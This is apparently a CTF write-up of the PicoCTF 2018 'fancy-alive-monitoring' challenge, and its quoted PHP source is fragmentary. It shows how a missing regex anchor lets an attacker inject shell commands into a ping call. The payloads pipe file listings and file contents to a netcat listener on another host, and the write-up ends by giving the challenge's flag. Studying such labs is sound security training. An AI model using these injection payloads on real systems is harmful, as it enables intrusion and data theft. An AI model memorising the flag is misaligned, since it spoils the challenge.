Rating:

# PicoCTF 2018: fancy-alive-monitoring
***Category: category***
>*One of my school mate developed an alive monitoring tool. Can you get a flag from http://2018shell2.picoctf.com:43316 (link)?*
## Solution

For this challenge, we are given a site which checks if an IP is alive or not, along with the page's source code:
```php
<html>
<head>
<title>Monitoring Tool</title>
<script>
function check(){
ip = document.getElementById("ip").value;
chk = ip.match(/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/);
if (!chk) {
alert("Wrong IP format.");
return false;
} else {
document.getElementById("monitor").submit();
}
}
</script>
</head>
<body>
<h1>Monitoring Tool ver 0.1</h1>
<form id="monitor" action="index.php" method="post" onsubmit="return false;">

Input IP address of the target host
<input id="ip" name="ip" type="text">


<input type="button" value="Go!" onclick="check()">
</form>
<hr>

Target is NOT alive.</h3>");
break;
} else if (strpos($str, ', 0% packet loss') !== false){
printf("<h3>Target is alive.</h3>");
break;
}
}
} else {
echo "Wrong IP Format.";
}
}
?>
<hr>
index.php source code
</body>
</html>
```

As I read through the source code, I noticed there were two checks: one client-side check and one server-side.
The client-side check can be circumvented by sending the request through Burp Suite.
The server-side check, on the other hand, is where the vulnerability is. I noticed the server-side check's regex expression was missing an end of string anchor. If you pass the server-side check, it will execute the following command:
```
exec('ping -c 1 '.$ip, $cmd_result);
```
Although the expression looks complicated, it's really just there to distract you so you won't notice the missing anchor. The expression is filled with `or` statements, so it will still match any valid IP. Since there is no end of string anchor, you can add on extra code and the server will execute it. To do this, just separate the code with a semi-colon. However, the website will only print `Target is NOT alive.` or `Target is alive.`, so you will have to find some other way to get the output of the injected code.

To solve the challenge, you can set up a listener on the picoCTF shell using any random port, like so:
```
nc -lvnp 7777
```
Once the listener is up, you can send the request through Burp Suite and pipe the result of the command to the listener. To find the ip address, just run `ifconfig` on the shell. If you send the following in the data of your POST request:
```
ip=1.1.1.1;ls | nc 172.31.32.197 7777
```
You'll get:
```
index.php
index.txt
the-secret-1045-flag.txt
xinet_startup.sh
```
Set up the listener again and read the contents of the `the-secret-1045-flag.txt` file with this request:
```
ip=1.1.1.1;cat the-secret-1045-flag.txt | nc 172.31.32.197 7777
```
And it will give you the flag.

***Flag: `picoCTF{n3v3r_trust_a_b0x_c4a9b715}`***

Original writeup (https://github.com/scai16/CTF/tree/master/2018/PicoCTF%202018/fancy-alive-monitoring).